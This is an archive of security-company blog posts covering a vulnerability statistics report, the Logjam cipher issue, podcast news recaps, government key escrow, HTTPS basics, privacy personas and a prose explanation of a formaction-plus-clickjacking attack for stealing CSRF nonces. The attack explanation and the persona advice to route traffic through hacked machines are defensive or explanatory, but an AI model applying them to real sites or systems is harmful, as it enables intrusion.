Category Archives: Technical Insight

WhiteHat Website Security Statistics Report: From Detection to Correction

While web security used to be a reactionary afterthought, it has evolved to become a necessity for organizations that wish to conduct online business safely. Companies have switched from playing defense to playing offense in a game that is still difficult to win. In an effort to change the game, WhiteHat Security has been publishing its Website Security Statistics Report since 2006 in the hope of helping organizations improve web security before they become victim to an attack.

After several editions, this is by far the most data rich, educational, insightful and useful application security report I have ever read. I may be biased, but I believe this report is unique: something special and different that is an essential read for application security professionals. In creating this report, I have learned more about what works and what doesn’t work than I have learned doing anything else in my many years of working in application security. I am extremely confident that our readers will appreciate what we have created for them.

In this year’s report, we examine the activities of real-world application security programs along with the most prevalent vulnerabilities based on data collected from more than 30,000 websites under WhiteHat Sentinel management. From there, we can then determine how many vulnerabilities get fixed, the average time it takes to fix them, and how every application security program can measurably improve. Our research provides insights into how organizations can better determine which security metric to improve upon.

We’ve learned that vulnerabilities are plentiful, that they stay open for weeks or months, and that typically only half get fixed. We have become adept at finding vulnerabilities. The next phase is to improve the remediation process. In order to keep up with the increase in vulnerabilities, we need to make the remediation process faster and easier. The amount of time companies are vulnerable to web attacks is much too long – an average of 193 days from the first notification. Increasing the rate at which these vulnerabilities are remediated is the only way to protect users.

The best way to lower the average number of vulnerabilities, speed up time-to-fix, and increase remediation rates is to feed vulnerability results back to development through established bug tracking or mitigation channels. This places application security at the forefront of development and minimizes the need for remediation further down the road. The goal is more secure software, not more security software.

For security to improve, organizations need to set aside the idea of ‘best practices’ and not stop at compliance controls. Multiple parts of the organization must determine which teams should be held accountable for their specific job function. Organizations that don’t hold specific teams accountable have an average remediation rate of 24% versus 33% for companies that do. When you empower those who are also accountable, the organization has a higher likelihood of being effective.

In this year’s edition, the WhiteHat Website Security Statistics Report drives home the point that we now have a very clear understanding of what vulnerabilities are out there. Based on that information, we must create a solid, measurable remediation program to remove those vulnerabilities and increase the safety and security of the web.

To view the full report, click here. I would also invite you to join the conversation on Twitter at #WHStats @whitehatsec.

Logjam: Web Encryption Vulnerability

A team of researchers has released details of a new attack called “Logjam.” This attack, like FREAK, enables a man-in-the-middle attacker to downgrade the connection between the client and the server to an easier-to-break cipher. Many servers support these weaker ciphers, though there is no practical reason to support them. The solution is to simply not support any ciphers that are easy to break. In fact, the browser makers are doing that right now.

The offending ciphers, Export Diffie-Hellman ciphers, can be found in HTTPS, SSH, VPN, mail, and many other servers. This does not, however, mean that you are vulnerable, or that you need to panic. Exploiting this vulnerability requires man-in-the-middle and a high level of sophistication. The real risk is relatively low on this issue compared to Poodle or Heartbleed. You should simply test your TLS endpoints to ensure that they do not support any weak ciphers. If you took this step back when FREAK came out, you are likely already okay.

The specific ciphers to disable for this attack are DHE_EXPORT ciphers (or “EXP-EDH-” ciphers). But go ahead and disable all weak ciphers, while you’re at it.

All WhiteHat Sentinel dynamic testing services (BE, SE, PE, PL, Elite) now report the use of export ciphers as part of reporting on weak ciphers, and specifically call out the ciphers that are a concern for Logjam.

The research team that released the report has also set up a page to test your servers here: https://weakdh.org/sysadmin.html.

Remember that when you test a hostname, you are really testing the TLS endpoint for that connection, which may be a load balancer or firewall, and not your application server.

#HackerKast 34: SOHO Routers hacked, 3d printed ammo, Nazis & child porn, PayPal Remote Code Execution, Dubsmash 2, Twitter CSRF

Hey Everybody! We’re back from our 1 week break due to crazy schedules and even now we are without Jeremiah. Coconuts don’t make great WiFi antennae or something.

Started this episode talking about some Vendors who decided to do some weird, bad stuff this past week. In both stories it seems some security vendors were caught being naughty, starting with Tiversa. They are a security firm that decided it’d be a good idea to extort their own clients by finding a fake vulnerability and asking for money to fix this fake vulnerability. Then Tencent and Qihoo, two different Chinese AV Vendors, were both caught cheating on a certification test about how good their products were.

Moving away from shady vendors and on to shady home wireless routers. Not news to anybody, really: wifi routers you buy off the shelf aren’t quite state of the art when it comes to security. Hence, we see some sort of router hacking story pop up all the time. This time SOHO routers were targeted by the hacking group Anonymous, as per a report from Incapsula. It seems Anonymous saw a good opportunity to exploit these home routers and use them as a botnet, running their DDoS tool for fun and profit. The extremely 1337 H@x0r methodology being used here, which takes many years of cyber security experience and probably a CISSP to exploit, is a default username and password. Try to keep up here, the DEFAULT USERNAME AND PASSWORD out of the box was used to compromise MILLIONS of home routers and turn them into DDoS bots. I’ll just leave that there.

Next, Robert talked about some of the most ridiculous topics we’ve talked about on the podcast. He somehow related 3d printed ammunition to a story about Nazis and child pornography. You see, some court ruled somewhere that the file on the computer that can be used to 3d print bullets is now considered as munitions legally. In related(?) news, there was some Nazi war camp website that got hacked and got child pornography uploaded to it. When child porn is involved, the government immediately must confiscate the computers as evidence which essentially takes the website offline. Robert related the two by saying that you could also upload a 3d printer file which would have the same effect, now that a file can constitute illegal munitions.

In vulnerability disclosure news, PayPal was vulnerable to Remote Code Execution via a 3rd party library they were using. The Java Debug Wire Protocol using Shellifier was leaving port 8000 open on some Paypal servers, which allowed an attacker to gain access remotely — without authenticating — and execute commands. The part we don’t know yet is whether or how much PayPal paid the researcher who disclosed this to them. They’ve been known to pay big bounties in the past.

Robert then covered a fake mobile app called Dubsmash 2 that was uploaded to the Google Play store this week and got wildly popular. Apparently, Dubsmash is a popular app which allows you to lip sync to some songs — but the fraudulent sequel app wouldn’t be nearly as fun. What it did was immediately remove the “Dubsmash” part of the app and replace the icon with a mimic “Settings” icon. The moment a user clicked this icon, the app would generate thousands of pop-unders of porn sites and click on ads. The thought here was they are using this in a pay-per-click fraud scheme to generate earnings for the developer. 500,000 users downloaded the fake app to date.

Lastly, we talked about a CSRF vulnerability disclosed via HackerOne to Twitter about 11 months ago and recently disclosed publicly. This CSRF protection bypass was *very* creative and used a behavior in certain frameworks which treats commas as semicolons. This would allow an attacker to exploit a user by sending them a malicious link which would allow the attacker to use the CSRF token they stole on mobile.twitter.com. Really cool research that I’m glad eventually became public.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:
Tiversa May Have Hacked Its Own Clients To Extort Them
2nd (Tencent and Qihoo) Chinese AV-Vendor Caught Cheating
3-D Printed Gun Lawsuit Starts the War Between Arms Control and Free Speech
Nazi camp website hacked with child porn on anniversary
MySQL Out of Band (2nd Order) Exploitation
Twitter CSRF Bug
PayPal Remote Code Execution (Java Debug Wire Protocol using Shellifier)
Your Smartphone Might Be Watching Porn Behind Your Back
Anonymous accused of running a botnet using thousands of hacked home routers

Notable stories this week that didn’t make the cut:
PHP == Operator Issue
Hack Google Password
Researchers Hijack Teleoperated Surgical Robot
Google PageSpeed Service End of Life
Windows to Kill of Patch Tuesday
PortSwigger Web Security Blog: Burp Suite now reports blind XXE injection
Practical Cache Attacks in JavaScript
25 Members of $15M Carding Gang Arrested
Apple ‘test’ iPad stolen from a Cupertino home: Report
Irate Congressman Gives Cops Easy Rule – Follow The Damned Constitution

#HackerKast 32: WordPress Core XSS, Spoof Email Tanks Stock, Tesla Defacement via DNS Hack, 451 Status Code, MS15-034 Microsoft Vulnerability

Hey All! Thanks for checking out this week’s HackerKast! We’re all back and recovering from RSA and my feet still hurt.

Starting off with This Week In WordPress Sucks™, we’ve got a vulnerability in WordPress core this time. This is usually not the case as core has been gone over several times with a fine toothed comb, but some persistent XSS in core comment functionality popped up anyway. Also, as per usual, a few hundred plugins were vulnerable to an XSS that was found in two different frequently used functions that were poorly documented. The core issue were patched already but it is up to administrators of WordPress installs to race and get the patch installed.

Next, in silly things that affect the stock market news, Italy’s 2nd largest bank had a hoax email go out pretending to be the CEO resigning. Within moments, the stock takes a huge crash before coming back up after everyone realizes it was a hoax. We’ve seen this before a few times, notably the time Associated Press Twitter account was hacked and tweeted about a bomb at the White House which caused the entire stock market to take a dive for a few minutes. This all points to the fact that there are automated stock trading systems out there making decisions based off of social media and news information.

We had a little chat about the recent problem over at Tesla where their homepage was “defaced”. This wasn’t actually a defacement of any servers on their end but the attackers went after the recently popular low hanging fruit of DNS providers. Once the DNS provider was owned, the homepage was redirected along with any MX records allowing emails to be rerouted to the attackers. With this email rerouting in place, they then sent out some Twitter password reset emails which allowed them to take over the social media accounts. What Robert and I touched on at the end here is that Tesla was lucky that this was all for the lulz because that email rerouting, if done correctly, could’ve been silently MiTMing the company’s emails for some time before anybody noticed. Scary stuff relying on a DNS provider with that level of severity of compromise.

A new status code is being presented in the HTTP standard for the purposes of displaying a legally related block. Instead of just a 404, the browser would now present a 451 which would mean legally restricted due to any number of reasons. Most popularly this would show up for geolocation related blocks of content that tons of Netflix users are very aware of.

Lastly, MS-15-034, came out which was a Microsoft Buffer Overflow vulnerability in IIS servers. Of course Robert couldn’t help himself and wrote a snippet of exploit code. Then in This Week In RSnake Puts Something Dangerous Social Media™ he posted this code to Twitter for people to play with exploit in a remotely exploitable way. We’re toying with a possible demo we could do of this for you all but might take some tinkering to make it interesting.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Resources:

XSS 0day in WordPress Core
Many WordPress Plugins Found Vulnerable to XSS
Fake Email Regarding CEO Resignation Tanks Stock
Tesla’s DNS and Twitter Account Hacked
New HTTP “Legally Restricted” Status Code Proposed
MS15-034 Buffer Overflow in Microsoft HTTP pt 1.
MS15-034 Buffer Overflow in Microsoft HTTP pt 2.
MS15-034 Buffer Overflow in Microsoft HTTP pt 3.

Notable stories this week that didn’t make the cut:

Thirty Meter Telescope Gets DDoS’d
Google’s April Fools Joke Actually Made Users Less Secure
Extremely Hackable eVoting Machine
Security Expert Pulled Off Flight by FBI After Exposing Airline Security Flaws
Senate Proposes Re-classifying Certain Uses of Software/Hardware as “Fair Use” and Exempt from DMCA
Navy Announces It Will Stop Buying Manned Aircraft
“Better Presentation of URLs in Search” Should Read “Removal of URLs In Search”
“The Real Deal” DarkNet 0Day Auction

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

Speaking of Government Backdoors

After Alex Stamos’ stand off with Admiral Mike Rogers, I got to thinking about what the Admiral must be saying when he insisted that government “front doors” were technically possible to create in a way that didn’t give them ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain to you why that is a bad idea and propose a technically less dangerous one.

Barring any conversations about the ethics, the legal conundrums, the loss of trust, the weakening of freedoms, the chilling effect, or the future where we have to provide similar access to any government that asks, there are some legitimate reasons this design is bad. First a brief primer on how split-keys work.

Let’s take a simple encryption algorithm that just uses the password “Will Wheaton” to decrypt the plaintext. Now let’s say government agency A (the FBI/NSA or some similar organization) has access to the first half of the password “Will”. “Will Wheaton” is a very weak password, but it’s made significantly weaker when one party knows at least half of the secret. But it gets worse. Let’s say government agency B (the FISA court) has the second half of the password “Wheaton”. Eventually they need to combine the password somewhere. That physical place is a place where both halves of the password have to be typed in at the same time. Let’s call it a SCIF for argument’s sake.

In this example the SCIF is now the one place where all secrets go, and makes it a prime target to attack. Now both parties can see the data, instead of it just being one party. There may be situations where truly only one party should see the data. If the password is always the same for every piece of encrypted information for all conversations, it practically guarantees abuse once both halves are known. Not only is it significantly easier to break the original encryption since both parties have half the key material, but it has also created a single place where two parties now have to combine their two halves and it is far more likely to be abused.

What happens when access to that user’s data is no longer deemed useful? Does the key no longer become useful? What if they find out they were mistaken and the data they were looking at is benign? Is there a way to disable their password? No – that’s not how passwords or keys work when they have to work everywhere all the time. All they can do is tell Apple, or Google or whoever created the backdoor to change the user’s keys and/or create a different backdoor password to be created. That’s one of the major drawbacks of this model. It could also inadvertently tip off the suspect in the process if they notice a new key being issued as well, depending on how it was implemented.

Now let’s take a slightly different scenario where Apple/Google had a rolling window where passwords changed every day, say. One day it was “Will Wheaton” the next it was “Darth Vader” and so on. That way the FBI/NSA and the FISA courts could subpoena any piece of information but it had to be marked with a certain time period (say ten days and they would use their corresponding 10 keys split into two parts each for a grand total of 20 key-halves). That way, they only had access to certain pieces of information and only for that one conversation, and nothing after that time period. That has a better chance of being successful, but still relies on the parties to come together at some point and allows them both to see the resultant classified material.

A more useful approach would be to have four sets of keys for each time-slice of one day. Key 1 and 2 belonged to the FBI/NSA and Key 3 and 4 belonged to the FISA court. Key 1 would decrypt to a blob of further encrypted material that would only be decrypted fully by Key 3 (think of Key 1 as the outer slice of an onion and Key 3 the inner slice to get to the center). Also Key 4 would decrypt a blob of decrypted material that could only be fully decrypted by key 2. That way you could guarantee that neither individual key could be subverted to fully decrypt without the other’s involvement. It would also allow either or both to see the resultant material should they need it but not without each other’s approval. It would also guarantee that the key material wouldn’t be abused beyond the time slice for the conversation in question.

So here is how it would break down. FBI/NSA ask FISA for approval to decrypt User A’s conversation with User B. FISA agrees, and FBI/NSA request Apple/Google give them the time slice of Tuesday and Wednesday. Apple/Google respond with corresponding numbers 1234 and 1235 with corresponding blobs of encrypted text (if the FBI/NSA don’t already have it).. FBI/NSA request that FISA decrypt the blobs with Key 4(Tuesday) and Key 4(Wednesday) corresponding with conversation 1234 and 1235. FISA returns two encrypted blobs that won’t be useful until the FBI/NSA use their Key 2(Tuesday) and Key 2(Wednesday) corresponding with the time slice Tuesday and Wednesday for conversation 1234 and 1235. The FBI/NSA decrypt the final encrypted blobs and are able to read the conversation. At this point Apple/Google know nothing about the data, only that it was subpoena’d. The FISA court was aware of and complicit in the decryption but never saw the data, and the FBI/NSA got only the data they requested and nothing more. If the Court also needs to see the data, corresponding keys 1 and 3 are used for the same time-slice against the corresponding blobs of data.

Of course this is a huge burden, because now each user has four keys that need to be created for each day. Assuming there are 3 billion people in the world, and they use probably 3 different types of chatting systems per day, that would require something like 36 billion keys to be shared by two government agencies (18 billion each) per day. That’s a lot. Not to mention that keys wouldn’t just be short passwords, but presumably something like x509 or GPG certs, which can be quite large. And that also assumes that they can somehow get access to those keys in a way that the other (or malicious 3rd parties) can’t intercept or see. The devil lies deep in those details.

Ultimately though, I think Alex Stamos is right to press the government. Our industry thrives on trust, and if people believe that the government is spying on them, they are significantly less likely to transact or act normally – as themselves. Even if we can solve for the technical problems we have to be extremely thoughtful on how or even if we deploy it at all. Even when one’s only crime is one of thought or ideas, this kind of system dramatically increases the likelihood that the idea of freedom of expression will be lost in the annals of time. We all have to decide: would we rather have security in the form of big brother, or would we rather have privacy? We can’t have both, so we had better make up our minds now before the decisions are made on our behalf.

Please check out a similar and wonderfully written post by Matthew Green as well.

Web Security for the Tech-Impaired: The Importance of the ’S’

There’s one little letter that has huge importance when you’re logging into sites or buying your favorite items: it’s the letter ’S’. The ’s’ I’m referring to is the ’S’ in HTTPS. You may never have seen the ’S’ before in your web browser, or you may have seen it and never realized it’s importance. You may know it as that thing that gets added before the website you type in. What is it’s meaning? Why is it important? You shall find these answers in this post!

HTTP and HTTPS are referred to as ‘protocols’. In essence, these protocols are defining how your computer will talk to another computer. As you browse the web, you may notice that some sites use HTTP, while others use HTTPS. If you bring up CNN’s home page edition.cnn.com you’ll notice that it either shows http in front of the URL in the URL bar or just edition.cnn.com. This shows that the site is using the HTTP protocol to communicate. HTTP is a non-secure way of transmitting data from your computer to the website. Data over the HTTP protocol can be intercepted and read at any point between you and the website’s computer. This is what’s known as a ‘man-in-the-middle’ (MITM). A person listening in on your virtual conversation between your computer and the website’s computer can look at all the data that’s being sent. This isn’t a big deal if you’re looking at articles on CNN or searching for content on Wikipedia, but what if you log in to a site or buy something from an online store? You certainly don’t want the bad guys to know your username and password or your credit card number, so how do you protect yourself?

This is where the mighty ’S’ comes to the rescue. The protocol HTTPS is a way of securely sending data from your computer to the website you are interacting with. If a site is using HTTPS you’ll notice the HTTPS in front of the URL. As an example, go to www.facebook.com. In more modern and up-to-date browsers, you’ll likely see the HTTPS colored in either green or red and a lock icon. The green text with the lock icon is stating that you’re communicating securely with this website and everything looks to be going well.

If the https is red, there is probably some type of issue with the site security. It may be that the site’s certificate is out of date or invalid, or it may be that the site includes insecure third-party content, or there may be other issues. In any case, it is always safest not to proceed with a transaction that involves information you would like to keep secure if the HTTPS and lock icon are not green.

HTTPS uses a complicated system to encrypt the data you send to the website and vice versa. A bad guy who is performing an MITM attack will still see the conversation between you and the website, but it will be completely incoherent, like listening to a conversation in a language that’s been made up by the two people talking. Anytime you are doing anything that requires a login, credit card number, social security numbers, or ANY private data, you want to make sure that you see that HTTPS protocol, and if you have the benefit of modern browsers, that the green lock icon is present. NEVER log in or give any sensitive information to a site that does not communicate over HTTPS.

Protecting your Intellectual Property: Are Binaries Safe?

Organizations have been steadily maturing their application testing strategies and in the next several weeks we will be releasing the WhiteHat Website Security Statistics report that explores the outcomes of that maturation.

As part of that research we explored some of the activities being undertaken as part of application security programs and we were impressed to see that 87% of the respondents perform static analysis. 32% of them perform it with each major release and 13% are performing it daily.

This adoption of testing earlier in the software lifecycle is a welcome move. It is not a simple task for many companies to build out the policies that are essential for driving the maturity of an application security program.

We wanted to explore a policy that seems to have been conflated with the need to gain visibly into third-party software service providers and commercial off-the-shelf software (COTS) vendors’ products.

There seems to be a significant amount of confusion and perhaps intentional fear uncertainty and doubt (FUD) in this area. The way you go about testing third party software should mirror the way you go about testing your own software. Binary analysis of software for the purpose of not exposing your Intellectual Property (IP) is where the question of measurable security lies.

Binaries can easily be decompiled, revealing nearly 100% of the source code. If your organization is distributing the binaries that make up your web application to a third party, you have effectively given them all the source code as well. This conflation of testing policies leads to a false sense of Intellectual Property protection.

Reverse engineering, while requiring some effort is no problem. Tools such as ILSpy and Show My Code are freely and widely available.Sharing your binaries in an attempt to protect your Intellectual Property actually end up exposing 100% of your IP.

Source and Binary

This video illustrates this point.

Educational Series: How lost or stolen binary applications expose all your intellectual property. from WhiteHat Security on Vimeo.

While customers are often required by policy to protect their source code, the only way to do that is to protect your binaries. That means being careful never to turn on the compilation options that allow for binary review that other vendors require. Or at a very minimum it requires that those same binaries never get uploaded to production where they may be exposed via vulnerabilities. Either way, if your requirement is to protect your IP you need to make certain your binaries don’t fall into the wrong hands, because inside of those binaries could be the keys to the castle.

For more information, click here to see the infographic on the two testing methodologies.

The Perils of Privacy Personas

Privacy is a complex beast, and depending on who you talk to, you get very different opinions of what is required to be private online. Some people really don’t care, and others really do. It just depends on the reasons why they care and the lengths they are both willing and able to go through to protect that privacy. This is a brief run-down on some various persona types. I’m sure people can come up with others, but this is a sampling of the kinds of people I have run across.

Alice (The Willfully Ignorant Consumer)

  • How Alice talks about online privacy: “I don’t have anything to hide.”
  • Alice’s perspective: Alice doesn’t see the issues with online advertising, governmental spying and doesn’t care who reads her email, what people do with her information, etc. She may, in the back of her mind, know that there are things she has to hide but she refuses to acknowledge it. She is not upset by invasive marketing, and feels the world will treat her the same way she treats it. She’s unwilling to do anything to protect herself, or learn anything beyond what she already knows. She’s much more interested in other things and doesn’t think it’s worth the time to protect herself. She will give people her password, because she denies the possibility of danger. She is a danger to all around her who would entrust her with any secrets.
  • Advice for Alice: Alice should do nothing. All of the terrible things that could happen to her don’t seem to matter to her, even when she is advised of the risks. This type of user can actually be embodied by Microsoft’s research paper So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users, which is to say that spending time on security has a negative financial tradeoff for most of the population when taken in a vacuum where one person’s security does not impact another’s.

Bob (The Risk Taker)

  • How Bob talks about online privacy: “I know I shouldn’t do X but it’s so convenient.”
  • Bob’s perspective: Bob knows that bad things do happen, and is even somewhat concerned about them. However, he knows he doesn’t know enough to protect himself and is more concerned about usability and convenience. He feels that the more he does to protect himself, the more inconvenient life is. He can be summed up with the term “Carpe Diem.” Every one of his passwords is the same. He choses weak security questions. He uses password managers. He clicks through any warning he sees. He downloads all of the programs he finds regardless of origin. He interacts on every social media site with a laissez-faire attitude.
  • Advice for Bob: He should pick email/hosting providers and vendors that naturally take his privacy and security seriously. Beyond that, there’s not much else he would be willing to change.

Cathy (The Average Consumer)

  • How Cathy talks about online privacy: “This whole Internet thing is terrifying, but really, what can I do? Tax preparation software, my utilities and email are essential. I can’t just leave the Internet.”
  • Cathy’s perspective: Cathy knows that the Internet is a scary place. Perhaps she or one of her friends has already been hacked. She would pick more secure and private options, but simply has no idea where to start. Everyone says she should take her security and privacy seriously, but how and who should she trust to give her the best advice? Advertisers are untrustworthy, security companies seem to get hacked all the time – nothing seems secure. It’s almost paralyzing. She follows whatever best practices she can find, but doesn’t even know where to begin unless it shows up in whatever publications she reads and happens to trust.
  • Advice for Cathy: Cathy should try to find options that have gone through rigorous third party testing by asking for certificates of attestation, or attempt to self-host where possible (E.g. local copies of tax software versus Internet-based versions), and follow all best practices for two-factor authentication. She should use ad-blocking software, VPNs and logs out of anything sensitive when finished. Ideally she should use a second browser for banking versus Internet activities. She shouldn’t click on links out of emails, shouldn’t install any unknown applications and even shouldn’t download trustworthy applications from untrustworthy websites. If a site is unknown, has a bad or nonexistent BBB rating or seems to not look “right”, she should avoid it. It may have been hacked or taken over. She should also do reputation checking on the site using Web of Trust or similar tools. She should look for the lock in her browser to make sure she is using SSL/TLS. She shouldn’t use public wifi connections. She should install all updates for every software that is already on her computer, uninstall anything she doesn’t need and make sure all services are disabled that aren’t necessary. If anything looks suspicious, she should ask a more technical person for help, and make sure she has backups of everything in the case of compromise.

Dave (The Paranoid Reporter)

  • How Dave thinks about online privacy: “I know the government is capable of just about anything. So I’ll do what I can to protect my sources, insomuch as that it enables me to do my job.”
  • Dave’s perspective: Dave is vaguely aware of some of the programs the various government agencies have in place. He may or may not be aware that other governments are just as interested in his information as the US government. Therefore, he places trust in poor places, mistakenly thinking he is somehow protected by geography or rule of law. He will go out of his way to install encryption software, and possibly some browser security and privacy plugins/add-ons, like ad-blocking software like Disconnect or maybe even something more draconian like NoScript. He’s downloaded Tor once to check it out, and has a PGP/GPG key that no one has ever used posted on his website. He relies heavily on his IT department to secure his computer. But he uses all social media, chats with friends, has an unsecured phone and still uses third party webmail for most things.
  • Advice for Dave: For the most part, Dave is woefully unequipped to handle sensitive information online. His phone(s) are easily tapped, his email is easily subpoenaed and his social media is easily crawled/monitored. Also, his whereabouts are always monitored in several different ways through his phone and social media. He is at risk of putting people’s lives in danger due to how he operates. He needs to have complete isolation and compartmentalization of his two lives. Meaning, his work computer and personal email/social presence should not intertwine. All sensitive stuff should be done through anonymous networks, and using heavily encrypted data that ideally becomes useless after a certain period of time. He should be using burner phones and he should be avoiding any easily discernible patterns when meeting with sources in person or talking to sources over the Internet.

Eve (The Political Dissident)

  • How Eve thinks about online privacy: “What I’m doing is life or death. Everyone wants to know who I am. It’s not paranoia if you’re right.”
  • Eve’s perspective: Eve knows the full breadth of government surveillance from all angles. She’s incredibly tuned in to how the Internet is effectively always spying on her traffic. Her life and the lives of her friends and family around her are at risk because of what she is working on. She cannot rely on anyone she knows to help her because it will put them and ultimately, herself, in the process. She is well read on all topics of Internet security and privacy and she takes absolutely every last precaution to protect her identity.
  • Advice for Eve: Eve needs to got to incredible lengths to use false identities to build up personas so that nothing is ever in her name. There should always be a fall-back secondary persona (also known as a backstop) that will take the fall if her primary persona is ever de-anonymized instead of her actual identity. She should never connect to the Internet from her own house, but rather travel to random destinations and connect into wifi at distances that won’t make it visually obvious. Everything she does should be encrypted. Her operating system should be using plausible deniability (E.g. VeraCrypt) and she should actually have a plausibly deniable reason for it to be enabled. She should use a VPN or hacked machines before surfing through a stripped down version of Tails, running various plugins that ensure that her browser is incapable of doing her harm. That includes plugins like NoScript, Request Policy, HTTPS Everywhere, etc. She should never go to the same wifi connection twice, and should use different modes of transportation whenever possible. She should never use her own credit card, but instead trade in various forms of online crypto-currencies, pre-paid credit cards, physical cash and barter/trade. She should use anonymous remailers and avoid using the same email address more than once. She should regularly destroy all evidence of her actions before returning to any place where she might be recognized. She should avoid wearing recognizable outfits, and cover her face as much as possible without drawing attention. She should never carry a phone, but if she must, it should have the battery removed. Her voice should never be transmitted due to voice-prints and phone-line/background noise forensics. All of her IDs should be put into a Faraday wallet. She should never create any social media accounts under her own name, never upload a picture of herself or surroundings, and never talk to anyone she knows personally while surfing online. She should avoid using any jargon, slang or words that are unique to her location. She should never talk about where she is, where she’s from or where she’s going. She should never tell anyone in real life what she’s doing and she should always have a cover story for every action she takes.

I think one of the biggest problems in our industry is the fact that we tend to give generic one-size-fits-all privacy advice. As you can see above, this sampling of various types of people isn’t perfect but it never could be. People’s backgrounds are so diverse and varied, that it would be impossible to precisely fit any one person into any bucket. Therefore privacy advice must be tailored to people’s ability to understand their interest in protecting themselves and the actual threat they’re facing.

Also, we often are talking at odds with regards to privacy vs security. Even if we didn’t have to worry about the intentions of those giving advice, as discussed in that video, we still can’t rely on the advice itself necessarily. Nor can we rely on the advice being well taken by the person we are giving it to. One party might fully believe that they’re doing all they need to be doing, while they are in fact making it extremely dangerous for those around them who have higher security requirements.

Anything could be a factor in people’s needs/interest/abilities with regards to privacy – age, sex, race, religion, cultural differences, philosophies, their location, which government they agree with, who they’re related to, how much money they have, etc. Who knows how any of those things might impact their privacy concerns and needs? If we give people one-size-fits-all privacy advice it is guaranteed to be a bad fit for most people.

#HackerKast 29 Bonus Round: Formaction Scriptless Attack

Today on HackerKast, Matt and I discussed something called a Formaction Scriptless Attack. Content Security Policy (CSP) has put a big theoretical dent in cross site scripting. I say theoretical because relatively few sites are taking advantage of it yet; but even if it is implemented to prevent JavaScript from loading on the page, that doesn’t necessarily remove the possibility of attack from HTML injection.

For example, let’s say you have a site that has CSP set up to prevent inline and remote JavaScript from loading using the nonce feature, which requires all script tags to include the nonce before they will load. The nonce is probably based on some locally known secret XOR’d with the user’s credential or something similar. Whatever the case the CSP nonce is not known. But what they really want to do is submit some form. Now the form itself might protect itself in a different way, using a server-generated nonce (a second one) to prevent cross site request forgeries. Barring any side channel attacks, MitM attacks or attacks against the server itself, it seems like this might stop you in your tracks.

HTML5 to the rescue! Let’s say the form has an id set of id=”form1″. HTML5 has a feature where any input field anywhere on the page (yes, even outside of the form block) can say that it belongs to any form using the “form” parameter (e.g. form=”form1”). That might be somewhat bad, because perhaps I can include an extra form field and make the user do something they didn’t mean to do. But worse yet, HTML5 also has a feature called formaction. Formaction allows me to change the location where the form is being submitted.

So if the attacker submits an input field that associates itself with the form that contains the secret nonce and also with the formaction directive which points the form to the attacker’s website, it’s pretty much game over if the user clicks on that button. So now the trick is to get the attacker to click on the button. Oh, if only there was a way to get people to click on arbitrary places on a page from another domain… oh wait! Clickjacking!

So if the site is using CSP but not using X-Frame-Options or similar techniques to prevent the site from being framed, the attacker can frame the page and force the user to click on the evil button that has set a formaction which points the form back to the attacker’s site. The attacker then takes that nonce, creates a page that automatically uses the nonces and forces a CSRF request with the secret nonce. So much for CSRF protection! Here is the original vulnerable page and here is the clickjacked version of it with semi-opacity enabled to make it easier to see (tested in Firefox only).

Scriptless attacks aren’t new, Mario Heiderich for example has been working on them for years, but they are deadly. It’s not quite the same thing as a cross domain read in this case, but it has the same effect – allowing the attacker to read information from the target domain for use in an attack. I highly recommend using X-Frame-Options on all your pages. But that only stops one form of the attack. It’s still possible to social engineer people and so on. Why devs need to associate input fields with forms outside of the form block is still a bit of a mystery to me and why they need to change the form action after the fact — even overriding the original location — is also a puzzle. But with every new feature comes a new way to abuse it. HTML5 is an interesting beast, that’s for sure!

Update: As mentioned on Twitter, you can use CSP to block formaction, but you have to do that or the attack will still work with other CSP rules. Also you can do the equivalent of X-Frame-Options in CSP as well. So a properly configured CSP might actually save you – very cool!